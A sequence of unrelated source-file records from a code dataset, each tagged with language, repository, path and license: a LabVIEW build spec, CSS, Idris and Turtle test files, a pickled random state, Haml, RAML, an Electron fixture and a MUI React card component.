Type="Str">VI</Property> <Property Name="Source[2].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[2].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[2].itemID" Type="Ref">/RT PXI Target - Pharlap/Instrument Addon Engine.lvlib/SubVIs</Property> <Property Name="Source[2].properties[0].type" Type="Str">Run when opened</Property> <Property Name="Source[2].properties[0].value" Type="Bool">false</Property> <Property Name="Source[2].properties[1].type" Type="Str">Allow debugging</Property> <Property Name="Source[2].properties[1].value" Type="Bool">false</Property> <Property Name="Source[2].properties[2].type" Type="Str">Auto error handling</Property> <Property Name="Source[2].properties[2].value" Type="Bool">false</Property> <Property Name="Source[2].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[2].properties[3].value" Type="Bool">true</Property> <Property Name="Source[2].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[2].properties[4].value" Type="Bool">true</Property> <Property Name="Source[2].propertiesCount" Type="Int">5</Property> <Property Name="Source[2].type" Type="Str">Container</Property> <Property Name="Source[3].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[3].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[3].itemID" Type="Ref">/RT PXI Target - Pharlap/Instrument Addon Engine.lvlib/Types</Property> <Property Name="Source[3].properties[0].type" Type="Str">Allow debugging</Property> <Property Name="Source[3].properties[0].value" Type="Bool">false</Property> <Property Name="Source[3].properties[1].type" Type="Str">Run when opened</Property> <Property Name="Source[3].properties[1].value" Type="Bool">false</Property> <Property Name="Source[3].properties[2].type" Type="Str">Auto error handling</Property> <Property Name="Source[3].properties[2].value" Type="Bool">false</Property> <Property Name="Source[3].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[3].properties[3].value" Type="Bool">true</Property> <Property Name="Source[3].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[3].properties[4].value" Type="Bool">true</Property> <Property Name="Source[3].propertiesCount" Type="Int">5</Property> <Property Name="Source[3].type" Type="Str">Container</Property> <Property Name="Source[4].destinationIndex" Type="Int">0</Property> <Property Name="Source[4].itemID" Type="Ref">/RT PXI Target - Pharlap/Instrument Addon Engine.lvlib/Processes/Instrument Main Engine.vi</Property> <Property Name="Source[4].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[4].properties[0].value" Type="Bool">false</Property> <Property Name="Source[4].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[4].properties[1].value" Type="Bool">true</Property> <Property Name="Source[4].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[4].properties[2].value" Type="Bool">false</Property> <Property Name="Source[4].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[4].properties[3].value" Type="Bool">false</Property> <Property Name="Source[4].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[4].properties[4].value" Type="Bool">false</Property> <Property Name="Source[4].propertiesCount" Type="Int">5</Property> <Property Name="Source[4].type" Type="Str">VI</Property> <Property Name="Source[5].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[5].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[5].itemID" Type="Ref">/RT PXI Target - Pharlap/Dependencies/Instrument Addon Shared.lvlib/Shared</Property> <Property Name="Source[5].properties[0].type" Type="Str">Run when opened</Property> <Property Name="Source[5].properties[0].value" Type="Bool">false</Property> <Property Name="Source[5].properties[1].type" Type="Str">Allow debugging</Property> <Property Name="Source[5].properties[1].value" Type="Bool">false</Property> <Property Name="Source[5].properties[2].type" Type="Str">Auto error handling</Property> <Property Name="Source[5].properties[2].value" Type="Bool">false</Property> <Property Name="Source[5].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[5].properties[3].value" Type="Bool">true</Property> <Property Name="Source[5].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[5].properties[4].value" Type="Bool">true</Property> <Property Name="Source[5].propertiesCount" Type="Int">5</Property> <Property Name="Source[5].type" Type="Str">Container</Property> <Property Name="Source[6].destinationIndex" Type="Int">2</Property> <Property Name="Source[6].itemID" Type="Ref">/RT PXI Target - Pharlap/Protections.lvlibp</Property> <Property Name="Source[6].preventRename" Type="Bool">true</Property> <Property Name="Source[6].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[7].destinationIndex" Type="Int">2</Property> <Property Name="Source[7].itemID" Type="Ref">/RT PXI Target - Pharlap/Protocols.lvlibp</Property> <Property Name="Source[7].preventRename" Type="Bool">true</Property> <Property Name="Source[7].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[8].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[8].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[8].Container.depDestIndex" Type="Int">0</Property> <Property Name="Source[8].itemID" Type="Ref">/RT PXI Target - Pharlap/Instrument Addon Engine.lvlib/Processes</Property> <Property Name="Source[8].properties[0].type" Type="Str">Auto error handling</Property> <Property Name="Source[8].properties[0].value" Type="Bool">false</Property> <Property Name="Source[8].properties[1].type" Type="Str">Allow debugging</Property> <Property Name="Source[8].properties[1].value" Type="Bool">false</Property> <Property Name="Source[8].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[8].properties[2].value" Type="Bool">false</Property> <Property Name="Source[8].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[8].properties[3].value" Type="Bool">false</Property> <Property Name="Source[8].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[8].properties[4].value" Type="Bool">true</Property> <Property Name="Source[8].propertiesCount" Type="Int">5</Property> <Property Name="Source[8].type" Type="Str">Container</Property> <Property Name="SourceCount" Type="Int">9</Property> </Item> </Item> </Item> </Project>
LabVIEW
3
bogdanp-ni/Instrument-Custom-Device
Source/Instrument Addon.lvproj
[ "Apache-2.0" ]
.App { font-family: sans-serif; text-align: center; display: grid; place-items: center; min-height: 100vh; } .count { font-size: 5rem; color: white; width: 150px; height: 150px; border-radius: 50%; display: grid; place-items: center; cursor: pointer; user-select: none; transition: all 100ms ease; background: #3069f9; border: 10px solid rgb(198, 214, 253); box-shadow: 0 2px 10px rgba(0, 0, 0, 0.15); } .count:active { transform: scale(0.95); box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1); } * { margin: 0; padding: 0; box-sizing: border-box; } body { margin: 0; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Fira Sans', 'Droid Sans', 'Helvetica Neue', sans-serif; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; }
CSS
3
bkucera2/cypress
npm/react/cypress/component/advanced/radioactive-state/counter/counter.css
[ "MIT" ]
module Spacing no : {n : Nat} -> Nat no {n} = ?no_rhs spaced : {n : Nat} -> Nat spaced { n } = ?spaced_rhs s1 : {n : Nat} -> Nat s1 { n} = ?s1_rhs s2 : {n : Nat} -> Nat s2 { n} = ?s2_rhs s3 : {n : Nat} -> Nat s3 { n} = ?s3_rhs noSEq : {n : Nat} -> Nat noSEq {n = a} = ?noSEq_rhs spacedEq : {n : Nat} -> Nat spacedEq { n = a } = ?spacedEq_rhs s1Eq : {n : Nat} -> Nat s1Eq { n = a} = ?s1Eq_rhs s2Eq : {n : Nat} -> Nat s2Eq { n = a} = ?s2Eq_rhs s3Eq : {n : Nat} -> Nat s3Eq { n = a} = ?s3Eq_rhs weirdNo : {n : Nat} -> Nat weirdNo {n } = ?weirdNo_rhs weird0a : {n : Nat} -> Nat weird0a {n= a} = ?weird0a_rhs weird0b : {n : Nat} -> Nat weird0b {n =b} = ?weird0b_rhs weird1a : {n : Nat} -> Nat weird1a { n= a} = ?weird1a_rhs weird1b : {n : Nat} -> Nat weird1b { n =b} = ?weird1b_rhs weird2a : {n : Nat} -> Nat weird2a { n= a} = ?weird2a_rhs weird2b : {n : Nat} -> Nat weird2b { n =b} = ?weird2b_rhs weirdSpacedA : {n : Nat} -> Nat weirdSpacedA { n= a } = ?weirdSpacedA_rhs weirdSpacedB : {n : Nat} -> Nat weirdSpacedB { n =b } = ?weirdSpacedB_rhs
Idris
3
ska80/idris-jvm
tests/idris2/interactive013/Spacing.idr
[ "BSD-3-Clause" ]
<div class="modal error hidden" id="modal-delete-selections"> <h2>DELETE</h2> <p>the selected photo(s) will be gone <strong>forever</strong>!</p> <b></b> <section id="deleting-filenames"></section> <progress id="deleting-selections" class="progress" value="0" max="100"></progress> <button class="action l md bold" onclick="deleteSelectedPhotos();">yes, delete</button> <button class="action r sm" onclick="hideActiveModal();">no, wait!</button> </div>
Kit
2
pws1453/web-client
source/imports/app/photos-modal-delete-selections.kit
[ "MIT" ]
crandom Random p0 (tRp1 (I2 (I2147483648 I1812115682 I2741755497 I1028055730 I809166036 I2773628650 I62321950 I535290043 I349877800 I976167039 I2490696940 I3631326955 I2107991114 I2941205793 I3199611605 I1871971556 I1456108540 I2984591044 I140836801 I4203227310 I3652722980 I4031971234 I555769760 I697301296 I2347638880 I3302335858 I320255162 I2553586608 I1570224361 I2838780912 I2315834918 I2351348158 I3545433015 I2292018579 I1177569331 I758497559 I2913311175 I1014948880 I1793619243 I3982451053 I3850988342 I2393984324 I1583100093 I3144742543 I3655047493 I3507532385 I3094515442 I350042434 I2455294844 I1038739312 I313809152 I189433072 I1653165452 I4186650593 I19281455 I2589680619 I4145931590 I4283266118 I636283172 I943618337 I3170184633 I2308766231 I634615159 I538152647 I2079576891 I1029442616 I3410689412 I1370292761 I1071718978 I2139496322 I1876699543 I3485866187 I3157490130 I1633105386 I1453253160 I3841322080 I3789608924 I4110770792 I95083673 I931354627 I2065389591 I3448339827 I3348204577 I3263528560 I2411324590 I4003055026 I1869670093 I2737231843 I4150701155 I2689667621 I2993263224 I3239890140 I1191430483 I1214399779 I3623428533 I1817058866 I3052274451 I326030082 I1505129312 I2306812262 I1349150363 I1099127895 I2543465574 I2396380193 I503926466 I1607109730 I3451716817 I58037114 I4290081119 I947517597 I3083440186 I520522630 I2948962496 I4184319574 I2957636335 I668374201 I2325446473 I472785314 I3791932366 I573017189 I2185725379 I1262251492 I3525089379 I2951262653 I1305347305 I940958122 I3343754566 I359371744 I3874044973 I396897232 I147188248 I716683703 I4013880315 I1133359586 I1794612249 I3480815192 I3988787804 I1729355809 I573408542 I1419310934 I1770030447 I3552845567 I1693976502 I1271189893 I2298236738 I2049219027 I3464198070 I1233574082 I1007451781 I1838253750 I687096593 I1131375603 I1223013895 I1490478435 I339265439 I4232792659 I491538536 I2816256769 I1044097522 I2566227049 I748762793 I1511830494 I3593259822 I4121279213 I3735541309 I3609794797 I1939942331 I377570434 I1437957554 I1831285696 I55062811 I2046783110 I1303902283 I1838349877 I420993556 I1256392560 I2795216506 I2783687924 I3322303169 I512794749 I308405826 I517164429 I3320436022 I1328403632 I2269184746 I3729522810 I3304314450 I2238756124 I1690581361 I3813277532 I4119706879 I2659447875 I388818978 I2064580814 I1586227676 I2627522685 I2017792269 I547928109 I859107450 I1062238929 I858886237 I3795783146 I4173914756 I3835915965 I3329504821 I3494579904 I838863205 I3399734724 I4247387481 I3618414834 I2984433798 I2165205561 I4260685684 I3045904244 I3450093836 I3597307595 I3215851166 I3162801328 I2558283799 I950068105 I1829664117 I3108542987 I2378860527 I790023460 I280087750 I1171478018 I2333653728 I3976932140 I896746152 I1802494195 I1232873794 I2749440836 I2032037296 I2012091682 I1296131034 I3892133385 I908161334 I2296791795 I548169794 I696265 I893156828 I426904709 I3565374535 I2655906825 I2792178515 I2406814632 I4038847579 I3123934642 I2197503004 I3535032597 I2266216689 I2117613462 I1787448518 I1875089416 I2037165384 I1140676321 I3606296464 I3229138231 I2458267132 I1874651171 I3331900867 I1000557654 I1432861701 I473636323 I2691783927 I1871437447 I1328016401 I4118690062 I449467602 I681789035 I864889442 I1200888928 I75769445 I4008690037 I2464577667 I4167795823 I3070097648 I2579174882 I1216886568 I3810116343 I2249507485 I3266903480 I3671233480 I100191658 I3087121334 I365063087 I3821275176 I2165052848 I1282465245 I3601570637 I3132413236 I2780570459 I3222142917 I3129794692 I2611590811 I947031677 I2991908938 I750997949 I3632575131 I1632014461 I2846484755 I2347261779 I2903959448 I1397316686 I1904578392 I774649578 I3164598558 I2429587609 I738244516 I1563304975 I1399317414 I1021316297 I3187933234 I2126780757 I4011907847 I4095169219 I3358010054 I2729978247 I3736811646 I3009656410 I2893043637 I4027447385 I1239610110 I1488806900 I2674866844 I442876374 I2853687260 I2785921005 I3151378528 I1180567 I2803146964 I982221759 I2192919417 I3087026181 I2480838002 I738452921 I687986185 I3049371676 I3636492954 I3468311299 I2379621102 I788988633 I1643210601 I2983998168 I2492730801 I2586048705 I604073029 I4121082815 I1496476928 I2972357110 I2663116968 I2642628592 I2116052039 I487186279 I2577680328 I3974766614 I730776636 I3842528855 I1929093695 I44626622 I3989908833 I1695426222 I3675479382 I3051784964 I1514876613 I1254036595 I2420450649 I3034377361 I2332990590 I1535175126 I185834384 I1107372900 I1707278185 I1286285295 I3332574225 I2785672437 I883170645 I2005666473 I3403131327 I4122021352 I1464032858 I3702576112 I260554598 I1837731650 I2594435345 I75771049 I2012484289 I3058649775 I29979703 I3861335335 I2506495152 I3786448704 I442947790 I2582724774 I4291336243 I2568189843 I1923072690 I1121589611 I837696302 I3284631720 I3865021324 I3576453165 I2559531629 I1459231762 I3506550036 I3754420159 I2622000757 I124228596 I1084328605 I1692830753 I547273558 I674282621 I655259103 I3188629610 I490502174 I2081001293 I3191330704 I4109943593 I1859948504 I3163806460 I508833168 I1256371033 I2709253790 I2068956572 I3092842814 I3913926529 I2039638759 I981982529 I536094190 I368855295 I51993975 I1597480732 I4058175522 I2155896702 I3196251991 I1081913893 I3952353788 I3545548108 I2370669647 I2206572308 I2576392991 I1732303374 I1153136290 I537641955 I1738691747 I3232854186 I2539632206 I2829760278 I3058187853 I1202425792 I3762361970 I2863949342 I2640635867 I376638744 I1857679757 I330798087 I1457400505 I1135610046 I606400715 I1859536026 I509811335 I529772308 I2579273244 I1890382004 I3959908876 I2612335971 I2834052227 I1434475986 I3684202717 I4015011345 I582567852 I3689969571 I3934753460 I3034960691 I208573292 I4004113742 I3992904842 I2587153719 I3529179079 I1565424987 I779130678 I1048582935 I3213591622 I3607793434 I3951254937 I2047811901 I7508850 I248544605 I4210090324 I2331490884 I70057213 I776474945 I1345528889 I3290403612 I1664955269 I1533143116 I545003424 I4141564478 I1257326139 I868843601 I2337603029 I1918131449 I1843439523 I1125519035 I673340118 I421408852 I1520454906 I1804722630 I3621254196 I2329968000 I39464672 I430583134 I294026512 I53978525 I2892276105 I1418863764 I3419054451 I1391595797 I3544981798 I4191780858 I825672357 I2972000844 I1571305069 I4231982845 I3611916419 I3045163168 I2982349733 I278572141 I4215338078 I839860504 I1819151779 I1412347479 I1386770353 I3914589491 I3783104977 I4124296733 I830546258 I89825624 I4110601328 I2545483429 I300600527 I516641158 I3693021034 I2852912854 I3240039868 I4167407959 I1479557946 I3621188804 I1391590944 I3578441128 I1227055556 I406898396 I3064054983 I25835338 I402664165 I4097682779 I2106728012 I203613622 I3045467686 I1381726438 I3798670110 I1342314961 I3552497361 I535913619 I2625787583 I1606574307 I1101269630 I1950513752 I1121355862 I3586816903 I438529984 I2473182121 I1229997203 I405445940 I1695535315 I427014336 I3916768430 I392298359 I1884642868 I1244730821 I741058080 I567479957 I3527621168 I3191971011 I3267069104 I4108668146 I1520795587 I166581006 I473794477 I1562126550 I929843010 I889533294 I1266556608 I874518650 I3520162092 I3013765049 I4220231414 I547246449 I3998093769 I3737193746 I3872944207 I793651876 I2606384318 I875991012 I1394836334 I4102011644 I854380426 I2618666767 I2568302000 I1995512132 I229491093 I2673500286 I3364550739 I3836923416 I243656987 I3944388983 I4064949677 I1416956378 I1703244487 I3990798829 I2023425781 I3926702214 I1229015501 I3174247824 I624 tp2 Ntp3 b.
SQL
0
shawwn/cpython
Lib/test/randv2_64.pck
[ "0BSD" ]
%p Issue was #{@issue_status} by #{sanitize_name(@updated_by.name)}
Haml
2
hugorebelo/gitlabhq
app/views/notify/issue_status_changed_email.html.haml
[ "MIT" ]
0 reg32_t "dword" 1 code_t "proc*" 2 num32_t "int" 3 uint32_t "size_t" 4 ptr(struct(0:num32_t,4:ptr(num8_t),8:ptr(num8_t),12:ptr(num8_t),16:ptr(num8_t),20:ptr(num8_t),24:ptr(num8_t),28:ptr(num8_t),32:ptr(num8_t),36:ptr(num8_t),40:ptr(num8_t),44:ptr(num8_t),48:ptr(struct(0:ptr(TOP),4:ptr(struct(0:num32_t,4:ptr(reg8_t),8:ptr(reg8_t),12:ptr(reg8_t),16:ptr(reg8_t),20:ptr(reg8_t),24:ptr(reg8_t),28:ptr(reg8_t),32:ptr(reg8_t),36:ptr(reg8_t),40:ptr(reg8_t),44:ptr(reg8_t),48:ptr(TOP),52:ptr(TOP),56:num32_t,60:num32_t,64:num32_t,68:uint16_t,70:int8_t,71:array(num8_t,1),72:ptr(TOP),76:num64_t,84:ptr(TOP),88:ptr(TOP),92:ptr(TOP),96:ptr(TOP),100:uint32_t,104:num32_t,108:array(num8_t,40))),8:num32_t)),52:ptr(struct(0:num32_t,4:ptr(num8_t),8:ptr(num8_t),12:ptr(num8_t),16:ptr(num8_t),20:ptr(num8_t),24:ptr(num8_t),28:ptr(num8_t),32:ptr(num8_t),36:ptr(num8_t),40:ptr(num8_t),44:ptr(num8_t),48:ptr(struct(0:ptr(TOP),4:ptr(TOP),8:num32_t)),52:ptr(TOP),56:num32_t,60:num32_t,64:num32_t,68:uint16_t,70:int8_t,71:array(num8_t,1),72:ptr(TOP),76:num64_t,84:ptr(TOP),88:ptr(TOP),92:ptr(TOP),96:ptr(TOP),100:uint32_t,104:num32_t,108:array(num8_t,40))),56:num32_t,60:num32_t,64:num32_t,68:uint16_t,70:int8_t,71:array(num8_t,1),72:ptr(TOP),76:num64_t,84:ptr(TOP),88:ptr(TOP),92:ptr(TOP),96:ptr(TOP),100:uint32_t,104:num32_t,108:array(num8_t,40))) "FILE*" 5 ptr(num8_t) "char*" 6 ptr(TOP) "void*" 7 num8_t "char" 8 ptr(array(reg8_t,16)) "unknown_128*" 9 ptr(array(reg8_t,56)) "unknown_448*" 10 ptr(array(reg8_t,107)) "unknown_856*" 11 ptr(array(reg8_t,42)) "unknown_336*" 12 ptr(reg32_t) "dword*" 13 ptr(num32_t) "int*" 5 ptr(num8_t) "char[]" 14 ptr(struct(0:num32_t,4:ptr(ptr(num8_t)),4294967292:reg32_t)) "Struct_2*" 15 ptr(struct(0:ptr(num8_t),4:num32_t,8:ptr(num32_t),12:num32_t)) "option*" 16 ptr(ptr(num8_t)) "char**" 17 ptr(struct(0:reg32_t,40:ptr(num8_t),44:ptr(num8_t))) "Struct_1*" 3 uint32_t "unsigned int" 18 ptr(uint32_t) "size_t*" 19 ptr(struct(0:reg32_t,4:ptr(TOP))) "Struct_0*" 20 ptr(struct(0:num32_t,4:reg32_t,40:ptr(num8_t),44:ptr(num8_t))) "Struct_7*" 21 reg64_t "qword" 22 int32_t "signed int" 23 ptr(struct(0:array(reg8_t,18),18:num8_t)) "StructFrag_1*" 24 ptr(struct(0:array(reg8_t,3),3:num8_t)) "StructFrag_11*" 18 ptr(uint32_t) "unsigned int*" 25 ptr(ptr(uint16_t)) "unsigned short**" 16 ptr(ptr(num8_t)) "char[][]" 26 ptr(struct(0:reg64_t,8:num8_t)) "StructFrag_9*" 27 ptr(ptr(TOP)) "void**" 12 ptr(reg32_t) "dword[]" 28 ptr(struct(0:num32_t,4:uint32_t,40:ptr(num8_t),44:ptr(num8_t))) "Struct_10*" 29 ptr(struct(0:num32_t,40:ptr(num8_t),44:ptr(num8_t))) "Struct_9*" 30 ptr(reg16_t) "word[]" 31 ptr(struct(0:array(reg8_t,51498),51498:reg32_t)) "StructFrag_4*" 32 ptr(struct(0:array(reg8_t,536870908),4294967292:reg32_t)) "StructFrag_5*" 33 ptr(struct(0:array(reg8_t,29244),29244:reg32_t)) "StructFrag_7*" 34 ptr(struct(0:array(reg8_t,456),456:reg32_t)) "StructFrag_8*" 35 ptr(struct(0:uint32_t,4:ptr(TOP))) "Struct_8*" 36 ptr(uint16_t) "unsigned short*" 37 ptr(struct(0:reg64_t,8:uint32_t)) "StructFrag_10*" 38 array(reg8_t,4096) "unknown_32768" 39 array(reg8_t,135168) "unknown_1081344" 40 array(reg8_t,30) "unknown_240" 41 array(reg8_t,5) "unknown_40" 42 array(reg8_t,29) "unknown_232" 43 array(reg8_t,16) "unknown_128" 44 array(reg8_t,107) "unknown_856" 45 array(reg8_t,64) "unknown_512" 46 array(reg8_t,50) "unknown_400" 47 array(reg8_t,10) "unknown_80" 48 array(reg8_t,27) "unknown_216" 49 array(reg8_t,28) "unknown_224" 50 array(reg8_t,6) "unknown_48" 51 reg16_t "word" 52 array(reg8_t,9) "unknown_72" 53 array(reg8_t,14) "unknown_112" 54 array(reg8_t,12) "unknown_96" 55 array(reg8_t,36) "unknown_288" 56 array(reg8_t,19) "unknown_152" 57 array(reg8_t,11) "unknown_88" 58 array(reg8_t,38) "unknown_304" 59 array(reg8_t,15) "unknown_120" 60 array(reg8_t,41) "unknown_328" 61 array(reg8_t,7) "unknown_56" 62 array(reg8_t,51) "unknown_408" 63 array(reg8_t,13) "unknown_104" 64 array(reg8_t,32) "unknown_256" 65 array(reg8_t,52) "unknown_416" 66 array(reg8_t,237) "unknown_1896" 67 array(reg8_t,53) "unknown_424" 68 array(reg8_t,65) "unknown_520" 69 array(reg8_t,42) "unknown_336" 70 array(reg8_t,66) "unknown_528" 71 array(reg8_t,20) "unknown_160" 72 array(reg8_t,24) "unknown_192" 73 array(reg8_t,109) "unknown_872" 74 array(reg8_t,31) "unknown_248" 75 array(reg8_t,33) "unknown_264" 76 array(reg8_t,45) "unknown_360" 77 array(reg8_t,39) "unknown_312" 78 array(reg8_t,80) "unknown_640" 79 array(reg8_t,96) "unknown_768" 80 array(reg8_t,112) "unknown_896" 81 array(reg8_t,18) "unknown_144" 82 array(reg8_t,62) "unknown_496" 83 array(reg8_t,74) "unknown_592" 84 array(reg8_t,25) "unknown_200" 85 array(reg8_t,3) "unknown_24" 86 array(reg8_t,17) "unknown_136" 87 array(reg8_t,47) "unknown_376" 88 array(reg8_t,22) "unknown_176" 89 array(reg8_t,21) "unknown_168" 90 array(reg8_t,44) "unknown_352" 91 array(reg8_t,26) "unknown_208" 92 array(reg8_t,34) "unknown_272" 93 array(reg8_t,90) "unknown_720" 94 array(reg8_t,57) "unknown_456" 95 array(reg8_t,23) "unknown_184" 96 array(reg8_t,37) "unknown_296" 97 array(reg8_t,87) "unknown_696" 98 array(reg8_t,162) "unknown_1296" 99 array(reg8_t,48) "unknown_384" 100 array(reg8_t,176) "unknown_1408" 101 array(reg8_t,160) "unknown_1280" 102 array(reg8_t,61) "unknown_488" 103 array(reg8_t,83) "unknown_664" 104 array(reg8_t,60) "unknown_480" 105 array(reg8_t,56) "unknown_448" 106 array(reg8_t,43) "unknown_344" 107 array(reg8_t,108) "unknown_864" 108 array(reg8_t,147) "unknown_1176" 109 array(reg8_t,71) "unknown_568" 110 array(reg8_t,72) "unknown_576" 111 array(num8_t,39) "char[39]" 112 array(num8_t,167) "char[167]" 113 array(num8_t,61) "char[61]" 114 array(num8_t,45) "char[45]" 115 array(num8_t,54) "char[54]" 116 array(num8_t,191) "char[191]" 117 array(num8_t,69) "char[69]" 118 array(num8_t,65) "char[65]" 119 array(num8_t,87) "char[87]" 120 array(num8_t,9) "char[9]" 121 array(num8_t,23) "char[23]" 122 array(num8_t,10) "char[10]" 123 array(num8_t,4) "char[4]" 124 array(num8_t,17) "char[17]" 125 array(num8_t,16) "char[16]" 126 array(num8_t,6) "char[6]" 127 array(num8_t,5) "char[5]" 128 struct(0:ptr(num8_t),4:num32_t,8:ptr(num32_t),12:num32_t) "option" 129 array(num8_t,12) "char[12]" 130 array(num8_t,7) "char[7]" 131 array(num8_t,56) "char[56]" 132 array(num8_t,8) "char[8]" 133 array(num8_t,3) "char[3]" 134 array(num8_t,2) "char[2]" 135 array(reg32_t,9) "dword[9]" 136 array(reg32_t,127) "dword[127]" 137 array(reg32_t,34) "dword[34]" 138 array(num8_t,28) "char[28]" 139 array(num8_t,21) "char[21]" 140 array(num8_t,22) "char[22]" 141 array(num8_t,20) "char[20]" 142 array(num8_t,203) "char[203]" 143 array(num8_t,32) "char[32]" 144 array(num8_t,36) "char[36]" 145 array(num8_t,40) "char[40]" 146 array(num8_t,44) "char[44]" 147 array(num8_t,48) "char[48]" 148 array(num8_t,52) "char[52]" 149 array(num8_t,60) "char[60]" 150 array(num8_t,64) "char[64]" 151 array(ptr(TOP),10) "void*[10]" 152 array(num8_t,47) "char[47]" 153 array(num8_t,78) "char[78]" 154 array(reg8_t,580) "unknown_4640" 155 array(reg8_t,4720) "unknown_37760" 156 array(reg8_t,5760) "unknown_46080" 1 code_t "(void -?-> dword)*" 157 array(reg8_t,232) "unknown_1856" 158 ptr(struct(0:reg16_t,2:num8_t)) "StructFrag_0*" 159 array(reg8_t,256) "unknown_2048"
BlitzBasic
1
matt-noonan/retypd-data
data/printenv.decls
[ "MIT" ]
#%RAML 1.0 DataType properties: id: integer name: string ownerName?: string
RAML
3
zeesh49/tutorials
raml/resource-types-and-traits/types/Foo.raml
[ "MIT" ]
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> </head> <body> <webview src="./a.html"/> <script> var {ipcRenderer} = require('electron') var wv = document.querySelector('webview') wv.addEventListener('dom-ready', () => { ipcRenderer.send('webview-dom-ready', wv.getWebContentsId()) }) </script> </body> </html>
HTML
3
lingxiao-Zhu/electron
spec/fixtures/pages/webview-did-attach-event.html
[ "MIT" ]
import * as React from 'react'; import Box from '@mui/material/Box'; import Card from '@mui/material/Card'; import CardActions from '@mui/material/CardActions'; import CardContent from '@mui/material/CardContent'; import Button from '@mui/material/Button'; import Typography from '@mui/material/Typography'; const bull = ( <Box component="span" sx={{ display: 'inline-block', mx: '2px', transform: 'scale(0.8)' }} > • </Box> ); const card = ( <React.Fragment> <CardContent> <Typography sx={{ fontSize: 14 }} color="text.secondary" gutterBottom> Word of the Day </Typography> <Typography variant="h5" component="div"> be{bull}nev{bull}o{bull}lent </Typography> <Typography sx={{ mb: 1.5 }} color="text.secondary"> adjective </Typography> <Typography variant="body2"> well meaning and kindly. <br /> {'"a benevolent smile"'} </Typography> </CardContent> <CardActions> <Button size="small">Learn More</Button> </CardActions> </React.Fragment> ); export default function OutlinedCard() { return ( <Box sx={{ minWidth: 275 }}> <Card variant="outlined">{card}</Card> </Box> ); }
TypeScript
4
dany-freeman/material-ui
docs/data/material/components/cards/OutlinedCard.tsx
[ "MIT" ]
# 10000 triple objects (10000 triples) more than the default Bison stack size @prefix : <http://example.org/ns#> . :a :b :c1, :c2, :c3, :c4, :c5, :c6, :c7, :c8, :c9, :c10, :c11, :c12, :c13, :c14, :c15, :c16, :c17, :c18, :c19, :c20, :c21, :c22, :c23, :c24, :c25, :c26, :c27, :c28, :c29, :c30, :c31, :c32, :c33, :c34, :c35, :c36, :c37, :c38, :c39, :c40, :c41, :c42, :c43, :c44, :c45, :c46, :c47, :c48, :c49, :c50, :c51, :c52, :c53, :c54, :c55, :c56, :c57, :c58, :c59, :c60, :c61, :c62, :c63, :c64, :c65, :c66, :c67, :c68, :c69, :c70, :c71, :c72, :c73, :c74, :c75, :c76, :c77, :c78, :c79, :c80, :c81, :c82, :c83, :c84, :c85, :c86, :c87, :c88, :c89, :c90, :c91, :c92, :c93, :c94, :c95, :c96, :c97, :c98, :c99, :c100, :c101, :c102, :c103, :c104, :c105, :c106, :c107, :c108, :c109, :c110, :c111, :c112, :c113, :c114, :c115, :c116, :c117, :c118, :c119, :c120, :c121, :c122, :c123, :c124, :c125, :c126, :c127, :c128, :c129, :c130, :c131, :c132, :c133, :c134, :c135, :c136, :c137, :c138, :c139, :c140, :c141, :c142, :c143, :c144, :c145, :c146, :c147, :c148, :c149, :c150, :c151, :c152, :c153, :c154, :c155, :c156, :c157, :c158, :c159, :c160, :c161, :c162, :c163, :c164, :c165, :c166, :c167, :c168, :c169, :c170, :c171, :c172, :c173, :c174, :c175, :c176, :c177, :c178, :c179, :c180, :c181, :c182, :c183, :c184, :c185, :c186, :c187, :c188, :c189, :c190, :c191, :c192, :c193, :c194, :c195, :c196, :c197, :c198, :c199, :c200, :c201, :c202, :c203, :c204, :c205, :c206, :c207, :c208, :c209, :c210, :c211, :c212, :c213, :c214, :c215, :c216, :c217, :c218, :c219, :c220, :c221, :c222, :c223, :c224, :c225, :c226, :c227, :c228, :c229, :c230, :c231, :c232, :c233, :c234, :c235, :c236, :c237, :c238, :c239, :c240, :c241, :c242, :c243, :c244, :c245, :c246, :c247, :c248, :c249, :c250, :c251, :c252, :c253, :c254, :c255, :c256, :c257, :c258, :c259, :c260, :c261, :c262, :c263, :c264, :c265, :c266, :c267, :c268, :c269, :c270, :c271, :c272, :c273, :c274, :c275, :c276, :c277, :c278, :c279, :c280, :c281, :c282, :c283, :c284, :c285, :c286, :c287, :c288, :c289, :c290, :c291, :c292, :c293, :c294, :c295, :c296, :c297, :c298, :c299, :c300, :c301, :c302, :c303, :c304, :c305, :c306, :c307, :c308, :c309, :c310, :c311, :c312, :c313, :c314, :c315, :c316, :c317, :c318, :c319, :c320, :c321, :c322, :c323, :c324, :c325, :c326, :c327, :c328, :c329, :c330, :c331, :c332, :c333, :c334, :c335, :c336, :c337, :c338, :c339, :c340, :c341, :c342, :c343, :c344, :c345, :c346, :c347, :c348, :c349, :c350, :c351, :c352, :c353, :c354, :c355, :c356, :c357, :c358, :c359, :c360, :c361, :c362, :c363, :c364, :c365, :c366, :c367, :c368, :c369, :c370, :c371, :c372, :c373, :c374, :c375, 